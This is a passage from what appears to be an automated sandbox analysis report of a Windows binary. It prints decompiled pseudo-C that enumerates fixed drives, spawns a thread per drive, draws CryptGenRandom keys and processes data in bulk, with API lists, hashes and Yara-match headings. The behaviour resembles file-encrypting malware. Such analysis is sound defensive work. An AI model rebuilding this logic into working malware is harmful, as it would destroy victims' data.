                    				if(_t131 != _t128) {
                    					 *((intOrPtr*)(_t133 - 0x48)) =  *((intOrPtr*)(_t133 - 0x44)) - _t95;
                    					 *((intOrPtr*)(_t133 - 0x4c)) = _t111 - _t95;
                    					while(1) {
                    						E013C8943(_t133 - 0x34, _t131);
                    						 *(_t133 - 4) = 1;
                    						_t87 = HeapAlloc(GetProcessHeap(), 8, 0x1c);
                    						 *_t95 = _t87;
                    						if(_t87 == 0) {
                    							break;
                    						}
                    						_t115 = _t133 - 0x34;
                    						if(_t87 != _t133 - 0x34) {
                    							E013C8D50(_t87, _t115, 0, 0xffffffff);
                    						}
                    						 *((short*)( *_t95 + 0x18)) =  *((intOrPtr*)(_t133 + 8));
                    						_t92 = CreateThread(0, 0, E013CA13F,  *_t95, 0,  *((intOrPtr*)(_t133 - 0x48)) + _t95); // executed
                    						 *( *((intOrPtr*)(_t133 - 0x4c)) + _t95) = _t92;
                    						if(_t92 == 0) {
                    							_push(3);
                    							L16:
                    							ExitProcess();
                    						}
                    						 *(_t133 - 4) = 0;
                    						_t95 =  &(_t95[1]);
                    						E013C8CB9(_t133 - 0x34, 1, 0);
                    						_t131 = _t131 + 0x18;
                    						if(_t131 != _t128) {
                    							continue;
                    						}
                    						_t95 =  *(_t133 - 0x38);
                    						_t111 =  *(_t133 - 0x3c);
                    						goto L8;
                    					}
                    					_push(2);
                    					goto L16;
                    				}
                    				L8:
                    				_t129 =  *(_t133 - 0x40);
                    				WaitForMultipleObjects(_t129, _t111, 1, 0xffffffff);
                    				if(_t129 != 0) {
                    					_t132 = _t95;
                    					_t81 =  *(_t133 - 0x3c) - _t95;
                    					 *(_t133 - 0x40) = _t81;
                    					_t96 = _t81;
                    					do {
                    						CloseHandle( *(_t132 + _t96));
                    						if( *_t132 != 0) {
                    							HeapFree(GetProcessHeap(), 0,  *_t132);
                    							 *_t132 =  *_t132 & 0x00000000;
                    						}
                    						_t132 =  &(_t132[1]);
                    						_t129 = _t129 - 1;
                    					} while (_t129 != 0);
                    					_t95 =  *(_t133 - 0x38);
                    				}
                    				L013F21E6(_t95);
                    				L013F21E6( *((intOrPtr*)(_t133 - 0x44)));
                    				L013F21E6( *(_t133 - 0x3c));
                    				return E013F26B1(E013C8D10(_t95, _t133 - 0x1c));
                    			}




















                    0x013ca164
                    0x013ca164
                    0x013ca16b
                    0x013ca175
                    0x013ca176
                    0x013ca177
                    0x013ca17b
                    0x013ca17c
                    0x013ca189
                    0x013ca18a
                    0x013ca18b
                    0x013ca18d
                    0x013ca195
                    0x013ca197
                    0x013ca19a
                    0x013ca1a4
                    0x013ca1aa
                    0x013ca1b0
                    0x013ca1bc
                    0x013ca1c2
                    0x013ca1d2
                    0x013ca1d3
                    0x013ca1d8
                    0x013ca1de
                    0x013ca1e1
                    0x013ca1e3
                    0x013ca1e8
                    0x013ca1f5
                    0x013ca1f8
                    0x013ca1fb
                    0x013ca1ff
                    0x013ca208
                    0x013ca213
                    0x013ca219
                    0x013ca21d
                    0x00000000
                    0x00000000
                    0x013ca223
                    0x013ca228
                    0x013ca231
                    0x013ca231
                    0x013ca23c
                    0x013ca252
                    0x013ca25b
                    0x013ca260
                    0x013ca2fd
                    0x013ca2ff
                    0x013ca2ff
                    0x013ca2ff
                    0x013ca26d
                    0x013ca271
                    0x013ca274
                    0x013ca279
                    0x013ca27e
                    0x00000000
                    0x00000000
                    0x013ca284
                    0x013ca287
                    0x00000000
                    0x013ca287
                    0x013ca305
                    0x00000000
                    0x013ca305
                    0x013ca28a
                    0x013ca28a
                    0x013ca293
                    0x013ca29b
                    0x013ca2a0
                    0x013ca2a2
                    0x013ca2a4
                    0x013ca2a7
                    0x013ca2a9
                    0x013ca2ac
                    0x013ca2b5
                    0x013ca2c2
                    0x013ca2c8
                    0x013ca2c8
                    0x013ca2cb
                    0x013ca2ce
                    0x013ca2ce
                    0x013ca2d3
                    0x013ca2d3
                    0x013ca2d7
                    0x013ca2df
                    0x013ca2e7
                    0x013ca2fc

                    APIs
                    • __EH_prolog3_GS.LIBCMT ref: 013CA16B
                      • Part of subcall function 013C8F21: __EH_prolog3_GS.LIBCMT ref: 013C8F28
                      • Part of subcall function 013C8F21: GetLogicalDriveStringsW.KERNEL32 ref: 013C8F93
                      • Part of subcall function 013C8F21: GetDriveTypeW.KERNEL32(?), ref: 013C901E
                    • GetProcessHeap.KERNEL32(00000008,0000001C), ref: 013CA20C
                    • HeapAlloc.KERNEL32(00000000), ref: 013CA213
                    • CreateThread.KERNEL32(00000000,00000000,Function_0000A13F,00000000,00000000,?), ref: 013CA252
                    • WaitForMultipleObjects.KERNEL32(?,00000000,00000001,000000FF), ref: 013CA293
                    • CloseHandle.KERNEL32(00000000), ref: 013CA2AC
                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 013CA2BB
                    • HeapFree.KERNEL32(00000000), ref: 013CA2C2
                    • ExitProcess.KERNEL32 ref: 013CA2FF
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: Heap$Process$DriveH_prolog3_$AllocCloseCreateExitFreeHandleLogicalMultipleObjectsStringsThreadTypeWait
                    • String ID:
                    • API String ID: 1372296798-0
                    • Opcode ID: 971ca98b2304b415e034c4196fef8e1d3d37b2d9cd87aaa5a4568cef0c2a5fc2
                    • Instruction ID: 26033641ba37989d4a569c6b664422d9570a4a1d7701fe71026905b67cd9330d
                    • Opcode Fuzzy Hash: 971ca98b2304b415e034c4196fef8e1d3d37b2d9cd87aaa5a4568cef0c2a5fc2
                    • Instruction Fuzzy Hash: 4C51BD72E01219AFEF249FBCDC45BAEBBB5AF14704F10412DE611EB295EA759D008B50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 76%
                    			E013EA350(BYTE* _a4, int _a8) {
                    				intOrPtr _v8;
                    				char _v16;
                    				signed int _v20;
                    				intOrPtr _v24;
                    				int _v28;
                    				int _v44;
                    				char _v84;
                    				void* _v85;
                    				void* __ebp;
                    				signed int _t17;
                    				signed int _t18;
                    				long** _t20;
                    				int _t21;
                    				signed int _t37;
                    
                    				_push(0xffffffff);
                    				_push(E01417CE8);
                    				_push( *[fs:0x0]);
                    				_t17 =  *0x1435234; // 0x78d9f939
                    				_t18 = _t17 ^ _t37;
                    				_v20 = _t18;
                    				_push(_t18);
                    				 *[fs:0x0] =  &_v16;
                    				_t20 = E013EA3F0(); // executed
                    				_t21 = CryptGenRandom( *_t20, _a8, _a4);
                    				_t40 = _t21;
                    				if(_t21 == 0) {
                    					_v24 = 0xf;
                    					_v28 = _t21;
                    					_v44 = _t21;
                    					E013C64B7( &_v44, _t40, "CryptGenRandom", 0xe);
                    					_v8 = 0;
                    					E013EA130( &_v84, _t40,  &_v44);
                    					_t21 = E013F4EC6( &_v84, 0x1432bdc);
                    				}
                    				 *[fs:0x0] = _v16;
                    				return E013F268B(_t21, _v20 ^ _t37);
                    			}

















                    0x013ea353
                    0x013ea355
                    0x013ea360
                    0x013ea364
                    0x013ea369
                    0x013ea36b
                    0x013ea36f
                    0x013ea373
                    0x013ea37f
                    0x013ea38a
                    0x013ea390
                    0x013ea392
                    0x013ea39e
                    0x013ea3a5
                    0x013ea3a8
                    0x013ea3ab
                    0x013ea3b3
                    0x013ea3be
                    0x013ea3cc
                    0x013ea3cc
                    0x013ea3d4
                    0x013ea3ea

                    APIs
                      • Part of subcall function 013EA3F0: new.LIBCMT ref: 013EA473
                      • Part of subcall function 013EA3F0: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 013EA4AD
                    • CryptGenRandom.ADVAPI32(00000000,?,?,78D9F939), ref: 013EA38A
                      • Part of subcall function 013EA130: GetLastError.KERNEL32(00000010,78D9F939,75D701B0,?,00000000,?,?,?,?,?,?,?,?,01417CB6,000000FF), ref: 013EA171
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013EA3CC
                      • Part of subcall function 013F4EC6: RaiseException.KERNEL32(?,?,013F0FA0,00000010,00000010,?,?,?,?,?,?,013F0FA0,00000010,01433568,?,00000010), ref: 013F4F25
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: Crypt$ContextErrorExceptionException@8LastRaiseRandomReleaseThrow
                    • String ID: CryptGenRandom
                    • API String ID: 1600773198-3616286655
                    • Opcode ID: 7e4fcd8c23a3777cafc1c3050ab6c8aff7a6e8362f654f1476afdadadd17d198
                    • Instruction ID: bdd6e501dfde2114013f27f3c16b441189c35b0a16d34024352abefeea632a0a
                    • Opcode Fuzzy Hash: 7e4fcd8c23a3777cafc1c3050ab6c8aff7a6e8362f654f1476afdadadd17d198
                    • Instruction Fuzzy Hash: 0B113071904259EFCB11DFA4C945BDEBBF8FB18724F10012EE401B7290EB74A504CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 79%
                    			E013C8F21(void* __eflags) {
                    				long _t51;
                    				signed int _t55;
                    				int _t60;
                    				void* _t67;
                    				WCHAR* _t71;
                    				intOrPtr _t88;
                    				intOrPtr* _t89;
                    				signed int _t90;
                    				intOrPtr _t91;
                    				void* _t92;
                    				void* _t95;
                    
                    				_t95 = __eflags;
                    				_push(0x40);
                    				E013F26F6(E014160C0);
                    				_t89 =  *((intOrPtr*)(_t92 + 8));
                    				 *((intOrPtr*)(_t92 - 0x44)) = _t89;
                    				 *((intOrPtr*)(_t92 - 0x48)) = 0;
                    				asm("stosd");
                    				 *((intOrPtr*)(_t92 - 0x4c)) = _t89;
                    				asm("stosd");
                    				asm("stosd");
                    				 *((intOrPtr*)(_t92 - 0x1c)) = 0;
                    				 *((intOrPtr*)(_t92 - 0x18)) = 0;
                    				 *((intOrPtr*)(_t92 - 0x14)) = 0;
                    				 *((intOrPtr*)(_t92 - 4)) = 1;
                    				_push(0x208);
                    				_t71 = E013F2CD3(0, _t95);
                    				if(_t71 == 0) {
                    					_t71 = 0;
                    					__eflags = 0;
                    				} else {
                    					E013F5890(0x208, _t71, 0, 0x208);
                    				}
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				 *_t89 = 0;
                    				 *((intOrPtr*)(_t89 + 4)) = 0;
                    				 *((intOrPtr*)(_t89 + 8)) = 0;
                    				 *((intOrPtr*)(_t92 - 0x48)) = 1;
                    				_t51 = GetLogicalDriveStringsW(0x104, _t71); // executed
                    				if(_t51 != 0) {
                    					_t90 = 0;
                    					do {
                    						_t55 = _t71[_t90] & 0x0000ffff;
                    						if(_t55 != 0) {
                    							 *(_t92 - 0x40) = _t55;
                    							 *((short*)(_t92 - 0x3e)) =  *((intOrPtr*)(_t71 + 2 + _t90 * 2));
                    							 *((short*)(_t92 - 0x3c)) =  *((intOrPtr*)(_t71 + 4 + _t90 * 2));
                    							_push(_t92 - 0x35);
                    							_t67 = E013C896B(_t92 - 0x34, _t92 - 0x40, _t92 - 0x3a);
                    							 *((char*)(_t92 - 4)) = 2;
                    							E013C982D(_t71, _t92 - 0x1c, _t67);
                    							 *((char*)(_t92 - 4)) = 1;
                    							E013C8CB9(_t92 - 0x34, 1, 0);
                    						}
                    						_t90 = _t90 + 4;
                    					} while (_t90 < 0x64);
                    					_t91 =  *((intOrPtr*)(_t92 - 0x1c));
                    					if(_t91 !=  *((intOrPtr*)(_t92 - 0x18))) {
                    						_t88 =  *((intOrPtr*)(_t92 - 0x44));
                    						do {
                    							E013C8943(_t92 - 0x34, _t91);
                    							 *((char*)(_t92 - 4)) = 3;
                    							_t59 =  >=  ?  *((void*)(_t92 - 0x34)) : _t92 - 0x34;
                    							_t60 = GetDriveTypeW( >=  ?  *((void*)(_t92 - 0x34)) : _t92 - 0x34); // executed
                    							if(_t60 == 3) {
                    								_push(_t92 - 0x34);
                    								E013C989A(_t88);
                    							}
                    							 *((char*)(_t92 - 4)) = 1;
                    							E013C8CB9(_t92 - 0x34, 1, 0);
                    							_t91 = _t91 + 0x18;
                    						} while (_t91 !=  *((intOrPtr*)(_t92 - 0x18)));
                    					}
                    					L013F21E6(_t71);
                    					_t89 =  *((intOrPtr*)(_t92 - 0x44));
                    				}
                    				E013C8D10(_t71, _t92 - 0x1c);
                    				return E013F26B1(_t89);
                    			}














                    0x013c8f21
                    0x013c8f21
                    0x013c8f28
                    0x013c8f2d
                    0x013c8f35
                    0x013c8f38
                    0x013c8f3d
                    0x013c8f3e
                    0x013c8f41
                    0x013c8f42
                    0x013c8f43
                    0x013c8f46
                    0x013c8f49
                    0x013c8f51
                    0x013c8f58
                    0x013c8f5e
                    0x013c8f63
                    0x013c8f73
                    0x013c8f73
                    0x013c8f65
                    0x013c8f69
                    0x013c8f6e
                    0x013c8f79
                    0x013c8f7a
                    0x013c8f7b
                    0x013c8f7e
                    0x013c8f80
                    0x013c8f83
                    0x013c8f8c
                    0x013c8f93
                    0x013c8f9b
                    0x013c8fa1
                    0x013c8fa3
                    0x013c8fa3
                    0x013c8faa
                    0x013c8fac
                    0x013c8fbb
                    0x013c8fc4
                    0x013c8fcb
                    0x013c8fd1
                    0x013c8fda
                    0x013c8fde
                    0x013c8fe9
                    0x013c8fed
                    0x013c8fed
                    0x013c8ff2
                    0x013c8ff5
                    0x013c8ffa
                    0x013c9000
                    0x013c9002
                    0x013c9005
                    0x013c9009
                    0x013c9015
                    0x013c9019
                    0x013c901e
                    0x013c9027
                    0x013c902e
                    0x013c902f
                    0x013c902f
                    0x013c903b
                    0x013c903f
                    0x013c9044
                    0x013c9047
                    0x013c9005
                    0x013c904d
                    0x013c9052
                    0x013c9055
                    0x013c9059
                    0x013c9065

                    APIs
                    • __EH_prolog3_GS.LIBCMT ref: 013C8F28
                    • GetLogicalDriveStringsW.KERNEL32 ref: 013C8F93
                    • GetDriveTypeW.KERNEL32(?), ref: 013C901E
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: Drive$H_prolog3_LogicalStringsType
                    • String ID:
                    • API String ID: 2983389820-0
                    • Opcode ID: 9d03458bba9750e4faf104c5711b3c89d65ee10488560ef29a4bd8e33b11bae2
                    • Instruction ID: 661214b8c8848198842b337f18ad0c3df23b9d183daf6912198cf968fdfd015f
                    • Opcode Fuzzy Hash: 9d03458bba9750e4faf104c5711b3c89d65ee10488560ef29a4bd8e33b11bae2
                    • Instruction Fuzzy Hash: A6416E75C0121AEADF10EFE8D844AEEFBB5AF54B08F11405DE605B7240D7B4AE45CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 87%
                    			E013EBAB0(intOrPtr* __ecx, signed int __edx, void* __eflags) {
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				signed int _t211;
                    				signed char _t216;
                    				char _t218;
                    				void* _t222;
                    				signed int _t228;
                    				signed char _t231;
                    				signed int _t237;
                    				signed char _t239;
                    				intOrPtr _t241;
                    				void* _t256;
                    				signed int _t257;
                    				void* _t286;
                    				void* _t291;
                    				void* _t297;
                    				intOrPtr _t302;
                    				unsigned int _t325;
                    				intOrPtr* _t342;
                    				void* _t343;
                    				signed char _t344;
                    				signed char _t345;
                    				void* _t347;
                    				void* _t348;
                    				unsigned int* _t350;
                    				void* _t369;
                    				void* _t375;
                    				signed int _t378;
                    				void* _t380;
                    				signed char _t390;
                    				signed int _t416;
                    				unsigned int _t427;
                    				signed int _t429;
                    				unsigned int _t432;
                    				unsigned int _t435;
                    				signed int _t438;
                    				intOrPtr _t439;
                    				intOrPtr _t444;
                    				signed int _t446;
                    				intOrPtr _t447;
                    				signed char _t454;
                    				signed int _t458;
                    				signed int _t459;
                    				signed int _t460;
                    				signed char _t462;
                    				intOrPtr* _t463;
                    				void* _t466;
                    				signed int _t471;
                    				void* _t472;
                    				void* _t474;
                    				void* _t475;
                    				void* _t476;
                    				void* _t480;
                    				void* _t481;
                    				void* _t483;
                    
                    				_t414 = __edx;
                    				_t471 = _t472 - 0x50;
                    				_push(0xffffffff);
                    				_push(E0141811A);
                    				_push( *[fs:0x0]);
                    				_t474 = _t472 - 0x10;
                    				_t211 =  *0x1435234; // 0x78d9f939
                    				_push(_t211 ^ _t471);
                    				 *[fs:0x0] = _t471 - 0xc;
                    				_t342 = __ecx;
                    				 *((intOrPtr*)(_t471 + 0x24)) = __ecx;
                    				_t438 =  *(_t471 + 0x64);
                    				E013EAE90(_t471 + 0x18, __edx, _t438);
                    				 *((intOrPtr*)(_t471 - 4)) = 0;
                    				_t458 = 0;
                    				 *(_t471 + 0x44) = 0;
                    				 *(_t471 + 0x2c) = 0;
                    				 *(_t471 + 0x40) = 0;
                    				 *(_t471 + 0x30) = 0;
                    				 *(_t471 + 0x4c) = 0;
                    				 *(_t471 + 0x34) = 0;
                    				 *((char*)(_t471 - 4)) = 1;
                    				if(_t438 != 0) {
                    					_t486 = _t438 - 0x3ffffff;
                    					if(_t438 > 0x3ffffff) {
                    						L2:
                    						_push("vector<T> too long");
                    						E013F0F81(_t414, _t438, _t458, _t486);
                    					}
                    					E013EC080(_t471 + 0x2c, _t414, _t486, _t438);
                    					_t458 =  *(_t471 + 0x30);
                    					 *(_t471 + 0x4c) =  *(_t471 + 0x34);
                    					 *(_t471 + 0x40) = _t458;
                    					 *(_t471 + 0x44) =  *(_t471 + 0x2c);
                    				}
                    				_t216 =  *(_t471 + 0x18);
                    				 *((intOrPtr*)(_t471 + 0x3c)) = 0;
                    				_t487 = _t438;
                    				if(_t438 != 0) {
                    					 *((intOrPtr*)(_t471 + 0x28)) = 0;
                    					 *(_t471 + 0x38) = _t216;
                    					do {
                    						_t438 = E013EB010(_t487,  *((intOrPtr*)(_t471 + 0x60)),  *((intOrPtr*)( *((intOrPtr*)( *_t342 + 0x14))))() & 0x000000ff, 0);
                    						_t390 =  *(_t471 + 0x44);
                    						 *((char*)(_t471 - 4)) = 2;
                    						if(_t438 >= _t458 || _t390 > _t438) {
                    							_t427 =  *(_t471 + 0x4c);
                    							__eflags = _t458 - _t427;
                    							if(_t458 != _t427) {
                    								L18:
                    								 *(_t471 + 0x48) = _t458;
                    								 *(_t471 + 0x40) = _t458;
                    								 *((char*)(_t471 - 4)) = 5;
                    								__eflags = _t458;
                    								if(_t458 != 0) {
                    									E013D2100(_t427, _t438);
                    									 *((char*)(_t471 - 4)) = 6;
                    									goto L20;
                    								}
                    								goto L21;
                    							} else {
                    								__eflags = _t427 - _t458 >> 6 - 1;
                    								if(_t427 - _t458 >> 6 >= 1) {
                    									goto L18;
                    								} else {
                    									_t458 = _t458 - _t390 >> 6;
                    									__eflags = 0x3ffffff - _t458 - 1;
                    									if(__eflags < 0) {
                    										goto L2;
                    									} else {
                    										_t466 = _t458 + 1;
                    										_t435 = _t427 - _t390 >> 6;
                    										 *(_t471 + 0x4c) = _t435;
                    										_t325 = _t435 >> 1;
                    										__eflags = 0x3ffffff - _t325 -  *(_t471 + 0x4c);
                    										_t427 =  >=  ? _t325 + _t435 : 0;
                    										__eflags = _t427 - _t466;
                    										_t467 =  >=  ? _t427 : _t466;
                    										E013EC080(_t471 + 0x2c, _t427, _t427 - _t466,  >=  ? _t427 : _t466);
                    										_t458 =  *(_t471 + 0x30);
                    										 *(_t471 + 0x4c) =  *(_t471 + 0x34);
                    										 *(_t471 + 0x44) =  *(_t471 + 0x2c);
                    										goto L18;
                    									}
                    								}
                    							}
                    						} else {
                    							_t414 =  *(_t471 + 0x4c);
                    							_t438 = _t438 - _t390;
                    							if(_t458 != _t414 || _t414 - _t458 >> 6 >= 1) {
                    								L12:
                    								 *(_t471 + 0x48) = _t458;
                    								_t438 = (_t438 & 0xffffffc0) + _t390;
                    								 *(_t471 + 0x40) = _t458;
                    								 *((char*)(_t471 - 4)) = 3;
                    								if(_t458 != 0) {
                    									E013D2100(_t414, _t438);
                    									 *((char*)(_t471 - 4)) = 4;
                    									L20:
                    									_t56 = _t438 + 0x18; // 0x18
                    									E013D2100(_t414, _t56);
                    									 *((intOrPtr*)(_t458 + 0x30)) =  *((intOrPtr*)(_t438 + 0x30));
                    									 *((intOrPtr*)(_t458 + 0x34)) =  *((intOrPtr*)(_t438 + 0x34));
                    									 *((intOrPtr*)(_t458 + 0x38)) =  *((intOrPtr*)(_t438 + 0x38));
                    									 *((char*)(_t458 + 0x3c)) =  *((intOrPtr*)(_t438 + 0x3c));
                    									 *((char*)(_t458 + 0x3d)) =  *((intOrPtr*)(_t438 + 0x3d));
                    									 *((char*)(_t458 + 0x3e)) =  *((intOrPtr*)(_t438 + 0x3e));
                    									 *((char*)(_t458 + 0x3f)) =  *((intOrPtr*)(_t438 + 0x3f));
                    								}
                    								goto L21;
                    							} else {
                    								_t458 = _t458 - _t390 >> 6;
                    								if(0x3ffffff - _t458 < 1) {
                    									goto L2;
                    								} else {
                    									_t432 = _t414 - _t390 >> 6;
                    									 *(_t471 + 0x4c) = _t432;
                    									_t414 =  >=  ? (_t432 >> 1) + _t432 : 0;
                    									_t470 =  >=  ?  >=  ? (_t432 >> 1) + _t432 : 0 : _t458 + 1;
                    									E013EC080(_t471 + 0x2c,  >=  ? (_t432 >> 1) + _t432 : 0, ( >=  ? (_t432 >> 1) + _t432 : 0) - _t458 + 1,  >=  ?  >=  ? (_t432 >> 1) + _t432 : 0 : _t458 + 1);
                    									_t390 =  *(_t471 + 0x2c);
                    									_t458 =  *(_t471 + 0x30);
                    									 *(_t471 + 0x4c) =  *(_t471 + 0x34);
                    									 *(_t471 + 0x44) = _t390;
                    									goto L12;
                    								}
                    							}
                    						}
                    						goto L28;
                    						L21:
                    						 *((intOrPtr*)(_t471 + 0x60)) =  *((intOrPtr*)(_t471 + 0x60)) + 0x18;
                    						_t458 = _t458 + 0x40;
                    						 *(_t471 + 0x30) = _t458;
                    						 *(_t471 + 0x40) = _t458;
                    						_t286 =  *(_t471 - 0x24);
                    						_t392 =  >=  ? _t471 - 0x28 : _t471 - 0x2c;
                    						 *(_t471 + 0x48) = _t286;
                    						_push( *(_t471 + 0x48));
                    						 *((char*)(_t471 - 4)) = 7;
                    						_t429 =  *( >=  ? _t471 - 0x28 : _t471 - 0x2c);
                    						memset(_t286, 0, _t429 << 2);
                    						_t481 = _t474 + 0xc;
                    						if(_t429 == 0) {
                    							L013CDA60();
                    						} else {
                    							E013CD9E0();
                    						}
                    						_t291 =  *(_t471 - 0x3c);
                    						_t396 =  >=  ? _t471 - 0x40 : _t471 - 0x44;
                    						 *(_t471 + 0x48) = _t291;
                    						_push( *(_t471 + 0x48));
                    						 *((char*)(_t471 - 4)) = 8;
                    						_t414 =  *( >=  ? _t471 - 0x40 : _t471 - 0x44);
                    						memset(_t291, 0, _t414 << 2);
                    						_t483 = _t481 + 0x10;
                    						if(_t414 == 0) {
                    							L013CDA60();
                    						} else {
                    							E013CD9E0();
                    						}
                    						_t474 = _t483 + 4;
                    						 *((char*)(_t471 - 4)) = 1;
                    						E013EB810( *((intOrPtr*)(_t471 + 0x28)) +  *(_t471 + 0x44), _t414);
                    						_t297 =  *((intOrPtr*)( *_t342 + 8))();
                    						_t454 =  *(_t471 + 0x38);
                    						E013EC610(_t454, 1 <<  *((intOrPtr*)( *((intOrPtr*)(_t471 + 0x28)) +  *(_t471 + 0x44) + 0x30)) - 1, _t297);
                    						 *((intOrPtr*)(_t471 + 0x28)) =  *((intOrPtr*)(_t471 + 0x28)) + 0x40;
                    						_t302 =  *((intOrPtr*)(_t471 + 0x3c)) + 1;
                    						 *((intOrPtr*)(_t471 + 0x3c)) = _t302;
                    						 *(_t471 + 0x38) = _t454 + 0xc;
                    					} while (_t302 <  *(_t471 + 0x64));
                    				}
                    				L28:
                    				_t439 = 0;
                    				 *((intOrPtr*)(_t471 + 0x3c)) = 0;
                    				E013D2100(_t414,  *(_t471 + 0x5c));
                    				 *((char*)(_t471 - 4)) = 9;
                    				while(1) {
                    					_t459 =  *(_t471 + 0x64);
                    					_t218 = 0;
                    					 *((char*)(_t471 + 0x63)) = 0;
                    					if(_t459 == 0) {
                    						break;
                    					}
                    					_t378 = _t459;
                    					_t426 =  *(_t471 + 0x18);
                    					_t350 =  *(_t471 + 0x44) + 0x38;
                    					_t463 =  *((intOrPtr*)(_t471 + 0x24));
                    					 *(_t471 + 0x5c) = _t426;
                    					 *(_t471 + 0x38) = _t378;
                    					do {
                    						if(_t350[1] == 0 && _t439 ==  *((intOrPtr*)(_t350 - 4))) {
                    							_t380 =  *_t426 + (( *_t350 >> 1) + ( *_t350 >> 1) * 2) * 8;
                    							 *(_t471 + 0x48) = _t380;
                    							if(_t350[1] == 0) {
                    								_t426 = _t471;
                    								 *((intOrPtr*)( *_t463 + 0x20))(_t380, _t471);
                    							} else {
                    								_t447 =  *_t463;
                    								 *((intOrPtr*)(_t447 + 0x20))( *(_t471 + 0x48),  *((intOrPtr*)(_t447 + 0x10))(_t471));
                    								_t439 =  *((intOrPtr*)(_t471 + 0x3c));
                    							}
                    							E013EB810(_t350 - 0x38, _t426);
                    							_t218 =  *((intOrPtr*)(_t471 + 0x63));
                    							_t426 =  *(_t471 + 0x5c);
                    							_t378 =  *(_t471 + 0x38);
                    						}
                    						if(_t218 != 0 || _t350[1] == _t218) {
                    							_t218 = 1;
                    						}
                    						_t426 = _t426 + 0xc;
                    						 *((char*)(_t471 + 0x63)) = _t218;
                    						_t350 =  &(_t350[0x10]);
                    						 *(_t471 + 0x5c) = _t426;
                    						_t378 = _t378 - 1;
                    						 *(_t471 + 0x38) = _t378;
                    					} while (_t378 != 0);
                    					_t342 = _t463;
                    					if(_t218 == 0) {
                    						__eflags =  *(_t471 + 0x64);
                    					} else {
                    						E013D2BA0(_t471,  *((intOrPtr*)( *_t342 + 0x18))(_t471));
                    						_t439 = _t439 + 1;
                    						 *((intOrPtr*)(_t471 + 0x3c)) = _t439;
                    						continue;
                    					}
                    					break;
                    				}
                    				_t460 =  *(_t471 + 0x40);
                    				if(__eflags != 0) {
                    					_t462 =  *(_t471 + 0x18);
                    					do {
                    						_t241 =  *((intOrPtr*)(_t471 + 0x58));
                    						 *((intOrPtr*)(_t471 + 0x60)) = _t241;
                    						 *((intOrPtr*)(_t471 + 0x58)) = _t241 + 0x18;
                    						E013D2BA0( *((intOrPtr*)(_t471 + 0x60)),  *_t462 + ((0x2aaaaaab * ( *((intOrPtr*)(_t462 + 4)) -  *_t462) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *((intOrPtr*)(_t462 + 4)) -  *_t462) >> 0x20 >> 2) + ((0x2aaaaaab * ( *((intOrPtr*)(_t462 + 4)) -  *_t462) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *((intOrPtr*)(_t462 + 4)) -  *_t462) >> 0x20 >> 2)) * 2 - 3) * 8);
                    						_t256 = (0x2aaaaaab * ( *((intOrPtr*)(_t462 + 4)) -  *_t462) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *((intOrPtr*)(_t462 + 4)) -  *_t462) >> 0x20 >> 2);
                    						__eflags = _t256 - 1;
                    						if(_t256 > 1) {
                    							_t257 = _t256 + 0xfffffffe;
                    							 *(_t471 + 0x5c) = _t257;
                    							__eflags = _t257 - 1;
                    							if(_t257 >= 1) {
                    								_t446 = _t257 + _t257 * 2 << 3;
                    								__eflags = _t446;
                    								do {
                    									_t375 =  *_t462 + _t446;
                    									 *((intOrPtr*)( *_t342 + 0x20))(_t375, _t375 + 0x18);
                    									 *((intOrPtr*)( *_t342 + 0x20))( *((intOrPtr*)(_t471 + 0x60)),  *_t462 + _t446);
                    									_t446 = _t446 - 0x18;
                    									_t168 = _t471 + 0x5c;
                    									 *_t168 =  *(_t471 + 0x5c) - 1;
                    									__eflags =  *_t168;
                    								} while ( *_t168 != 0);
                    							}
                    							_t369 =  *_t462;
